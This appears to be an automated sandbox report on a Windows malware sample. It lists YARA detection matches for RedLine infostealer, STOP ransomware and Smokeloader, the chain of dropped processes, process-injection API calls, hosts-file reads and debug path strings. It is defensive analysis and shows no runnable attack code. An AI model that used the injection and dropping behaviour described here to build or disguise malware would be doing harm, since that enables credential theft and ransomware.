Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: String function: 00413FF0 appears 54 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401558
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401749
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401564
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401523
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401585
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040158C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040159A
Source: C4AA.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@17/6@3/3
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C676.exe C:\Users\user\AppData\Local\Temp\C676.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\beirutt C:\Users\user\AppData\Roaming\beirutt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C4AA.exe C:\Users\user\AppData\Local\Temp\C4AA.exe
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E}\InprocServer32
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C676.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B005C CreateToolhelp32Snapshot,Module32First, 0_2_007B005C
Source: C:\Users\user\AppData\Roaming\beirutt Command line argument: neyijabizux 7_2_00403A3E
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
